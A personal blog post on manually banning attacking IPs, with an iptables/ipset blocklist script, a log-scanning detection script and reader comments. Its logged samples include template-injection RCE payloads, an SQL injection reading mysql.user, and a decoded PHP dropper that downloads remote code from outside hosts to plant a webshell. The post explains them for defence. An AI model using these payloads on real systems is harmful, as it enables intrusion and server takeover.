Gojira 哥斯拉


Manually banning IPs, part 2: samples of malicious requests

gojira.net

Below is the record of IPs banned over the past month, every one checked by hand, ready to use as-is.
On Linux, just copy the content below and run it; the only prerequisite is that iptables is installed.

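Before running a hand-kept list like this, it pays to validate and de-duplicate it (the list above contains an exact duplicate and a host already covered by a /24) and to load it in a way that can be re-run without stacking identical rules. The following added example, not the blog's own script, does that with an ipset matched by a single iptables rule instead of one `-I` rule per address; the set name `webblock` and the sample entries (RFC 5737 ranges) are assumptions.

```shell
#!/bin/sh
# Added example, not the blog's own script: validate, de-duplicate and apply a
# hand-maintained IPv4 blocklist for ports 80/443. Entries go into one ipset
# (hash:net) matched by a single iptables rule, instead of one -I rule per address.
# The set name "webblock" and the sample entries (RFC 5737 ranges) are constructed.
set -f                                   # no globbing: "set -- $addr" below is safe
SET_NAME=webblock

# Return 0 if $1 is a dotted-quad IPv4 address with an optional /0-32 prefix.
valid_entry() {
    addr=${1%%/*}
    prefix=${1#*/}
    [ "$prefix" = "$1" ] && prefix=32    # no "/": a single host
    case "$prefix" in ''|*[!0-9]*) return 1 ;; esac
    [ "$prefix" -le 32 ] || return 1
    old_ifs=$IFS; IFS=.; set -- $addr; IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in ''|*[!0-9]*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# stdin: raw list (one entry per line, "#" comments allowed) -> stdout: valid
# entries with whitespace stripped and duplicates removed; bad ones go to stderr.
clean_list() {
    while IFS= read -r line; do
        entry=$(printf '%s' "${line%%#*}" | tr -d ' \t')
        [ -n "$entry" ] || continue
        if valid_entry "$entry"; then printf '%s\n' "$entry"
        else printf 'skipping malformed entry: %s\n' "$line" >&2; fi
    done | sort -u
}

# stdin: cleaned list -> stdout: shell commands that are safe to re-run
# (ipset -exist, and iptables -C before -I so the DROP rule is never duplicated).
render_rules() {
    printf 'ipset create -exist %s hash:net\n' "$SET_NAME"
    while IFS= read -r entry; do
        printf 'ipset add -exist %s %s\n' "$SET_NAME" "$entry"
    done
    rule="INPUT -m set --match-set $SET_NAME src -p tcp -m multiport --dports 80,443 -j DROP"
    printf 'iptables -C %s 2>/dev/null || iptables -I %s\n' "$rule" "$rule"
}

# Constructed sample: a /24, a host inside it, an exact duplicate, and a typo.
SAMPLE_LIST='192.0.2.0/24
198.51.100.7   # duplicate below
198.51.100.7
203.0.113.9
203.0.113.999'
```

As root, `printf '%s\n' "$SAMPLE_LIST" | clean_list | render_rules | sh` loads the set and installs the rule; re-running it changes nothing.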

Previous batch of banned IPs

Samples of malicious requests

96.43.98.20 POST   /?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue
This exploits a flaw in the server-side template engine to execute arbitrary code; the payload is:
usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3)))


45.61.161.87   POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20'cmFnYTNkYXdsZWRpYWppaG5heWE='%20%7C%20base64%20--decode%20&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9


185.34.145.36   GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=s6.php&t2=file_get_contents&t3=http://www.gsxiaomiao.com/html/1.txt
The malicious template code: %7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D
The value of get(t) is file_put_contents, which is then called as a function name.
file_put_contents writes the result of file_get_contents(http://www.gsxiaomiao.com/html/1.txt) into the file s6.php.


183.144.121.20   GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5(1234),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
The malicious SQL query:
) and (select 1 from (select count(*),concat((select concat(user,0x3a,md5(1234),0x3a) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#


GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dC9tYTEudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=1
The decoded payload:
<?php
file_put_contents('./core/basic/fun.php', file_get_contents('http://d.sogoud.vip/txt/ma1.txt'));
echo 'temp111888';
unlink(__FILE__);


GET /index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=PD9waHAgcGhwaW5mbygpOz8+
PD9waHAgcGhwaW5mbygpOz8+ decodes to <?php phpinfo();?>, which dumps PHP's configuration details, including some information about the server.

Most of the URLs fetched by the payloads above belong to sites that were themselves compromised.
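To find requests like these in your own access log rather than by eye, here is an added example (not from the blog) that flags log lines matching the patterns dissected above (the template `:if` tag, literal or %-encoded; file_put_contents and create_function; information_schema probing; the base64 --decode and wfu_file_downloader.php requests) and counts hits per client so repeat offenders can be reviewed for the blocklist. The log lines, with their RFC 5737 addresses and shortened paths, are constructed.

```shell
#!/bin/sh
# Added example, not the blog's code: pick out access-log lines that carry the
# request patterns dissected above and count hits per client, so repeat offenders
# can be reviewed before they go on the blocklist.
# The log lines (RFC 5737 addresses, shortened paths) are constructed.

# Matched case-insensitively; the opening brace is accepted literal or %-encoded.
SUSPECT_PATTERNS='([{]|%7B)pb[a-z/]*:if|create_function|file_put_contents|information_schema|base64(%20| )+--decode|wfu_file_downloader\.php'

# stdin: nginx/Apache "combined" log -> stdout: "client_ip<TAB>request_path".
flag_requests() {
    grep -Ei "$SUSPECT_PATTERNS" | awk '{ print $1 "\t" $7 }'
}

# stdin: log -> stdout: client IPs with at least $1 flagged requests (default 1).
# Review the paths before blocking: scanners you run yourself trip the same patterns.
suspect_ips() {
    flag_requests | cut -f1 | sort | uniq -c | awk -v min="${1:-1}" '$1 >= min { print $2 }'
}

# Constructed sample log: two probes from one client, one from another, two benign hits.
SAMPLE_LOG='203.0.113.9 - - [24/Feb/2025:10:00:01 +0800] "POST /?tag={pbohome/Indexot:if(...create_function...)}{/pbohome/Indexot:if} HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Feb/2025:10:00:02 +0800] "GET /?tag=%7Bpbohome/Indexot:if(...)%7D&t=file_put_contents&t1=s6.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Feb/2025:10:00:03 +0800] "GET /faq.php?action=grouppermission&gids[100][0]=)%20and%20(select...information_schema.tables...) HTTP/1.1" 200 233 "-" "curl/8.0"
192.0.2.44 - - [24/Feb/2025:10:00:04 +0800] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
192.0.2.44 - - [24/Feb/2025:10:00:05 +0800] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"'
```

`printf '%s\n' "$SAMPLE_LOG" | suspect_ips 2` lists only 203.0.113.9; run it against the real log as `suspect_ips 2 < /var/log/nginx/access.log` and feed the reviewed result to the blocklist.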


Comments (8)

  1. You've become active again lately!

    拾风 2025.03.24 13:13:54 Reply
    • Because I missed you old blog friends.

      高飞 (blog owner) 2025.03.24 17:00:54 Reply
  2. I recall you can set up your own WAF and import these IPs into it. My approach is to turn on the nginx firewall in 宝塔 (BT Panel), plus fail2ban, which automatically blacklists anyone whose request rate exceeds the threshold.

    Jeffer.Z 2025.03.19 20:22:39 Reply
    • In part 1 of manual IP banning I explained why I don't use a WAF, 宝塔 and the like.

      高飞 (blog owner) 2025.03.24 17:00:23 Reply
  3. They're basically all zombie hosts run by the underground economy; banning them or not makes no real difference.

    石樱灯笼 L1 Novice 2025.03.19 01:12:21 Reply
    • Banning still helps a lot. Bursts of several thousand to over ten thousand requests a minute used to be routine; now traffic is basically stable and stays flat all day.

      高飞 (blog owner) 2025.03.19 10:25:14 Reply
  4. I recently pulled my logs into a database and manually banned quite a few IPs too.

    萧瑟 L2 Rising star 2025.03.17 14:57:00 Reply
    • Pulled them into a database? Which database? Teach me.

      高飞 (blog owner) 2025.03.19 10:23:33 Reply